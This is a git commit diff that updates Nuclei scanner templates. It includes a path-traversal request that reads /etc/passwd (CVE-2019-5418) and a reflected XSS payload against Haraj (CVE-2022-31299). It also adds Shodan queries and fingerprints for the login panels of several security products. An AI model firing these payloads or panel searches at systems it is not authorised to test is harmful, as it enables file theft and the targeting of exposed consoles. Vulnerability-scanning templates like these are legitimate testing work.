Up PoCs 2022-09-18

hktalent · hktalent · commit a18c0de8d7ec · 2022-09-18T18:52:01.000+08:00
diff --git a/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml b/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml
@@ -20,16 +20,20 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+
     headers:
       Accept: ../../../../../../../../etc/passwd{{
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+          - 500
+
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
 
 # Enhanced by mp on 2022/04/12
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-29548.yaml b/config/nuclei-templates/cves/2022/CVE-2022-29548.yaml
@@ -18,7 +18,7 @@ info:
   metadata:
     google-query: inurl:"carbon/admin/login"
     verified: "true"
-  tags: cve,cve2022,wso2,xss
+  tags: cve,cve2022,wso2,xss,packetstorm
 
 requests:
   - method: GET
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-31299.yaml b/config/nuclei-templates/cves/2022/CVE-2022-31299.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-31299
+
+info:
+  name: Haraj v3.7 - Cross Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
+  reference:
+    - https://github.com/bigzooooz/CVE-2022-31299
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31299
+    - https://angtech.org
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-31299
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,haraj,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '><script>alert(document.domain)</script></textarea>'
+          - 'content="nextHaraj'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-35413.yaml b/config/nuclei-templates/cves/2022/CVE-2022-35413.yaml
@@ -11,7 +11,10 @@ info:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
     - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-35413
+    cwe-id: CWE-798
   metadata:
     shodan-query: http.title:"Intelligent WAPPLES"
     verified: "true"
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-40734.yaml b/config/nuclei-templates/cves/2022/CVE-2022-40734.yaml
@@ -3,17 +3,20 @@ id: CVE-2022-40734
 info:
   name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
   author: arafatansari
-  severity: high
+  severity: medium
   description: |
     UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
   reference:
     - https://github.com/UniSharp/laravel-filemanager/issues/1150
     - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
     cve-id: CVE-2022-40734
+    cwe-id: CWE-22
   metadata:
-    verified: true
     shodan-query: http.html:"Laravel Filemanager"
+    verified: "true"
   tags: cve,cve2022,laravel,unisharp,lfi,traversal
 
 requests:
diff --git a/config/nuclei-templates/exposed-panels/bitdefender-gravityzone.yaml b/config/nuclei-templates/exposed-panels/bitdefender-gravityzone.yaml
@@ -0,0 +1,26 @@
+id: bitdefender-gravityzone
+
+info:
+  name: Bitdefender GravityZone
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Bitdefender GravityZone"
+  tags: panel,bitdefender
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Bitdefender GravityZone</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposed-panels/darktrace-threat-visualizer.yaml b/config/nuclei-templates/exposed-panels/darktrace-threat-visualizer.yaml
@@ -0,0 +1,26 @@
+id: darktrace-threat-visualizer
+
+info:
+  name: Darktrace Threat Visualizer
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Darktrace Threat Visualizer"
+  tags: panel,darktrace
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Login | Darktrace Threat Visualizer</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposed-panels/datadog-login.yaml b/config/nuclei-templates/exposed-panels/datadog-login.yaml
@@ -0,0 +1,26 @@
+id: datadog-login
+
+info:
+  name: Datadog Login Panel
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Datadog"
+  tags: panel,datadog
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/account/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Datadog: Log In</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposed-panels/sentinelone-console.yaml b/config/nuclei-templates/exposed-panels/sentinelone-console.yaml
@@ -0,0 +1,26 @@
+id: sentinelone-console
+
+info:
+  name: SentinelOne - Management Console
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"SentinelOne - Management Console"
+  tags: panel,sentinelone
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'SentinelOne - Management Console'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposed-panels/webroot-login.yaml b/config/nuclei-templates/exposed-panels/webroot-login.yaml
@@ -0,0 +1,26 @@
+id: webroot-login
+
+info:
+  name: Webroot - Login
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Webroot - Login"
+  tags: panel,webroot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Webroot - Login</title>'
+
+      - type: status
+        status:
+          - 200
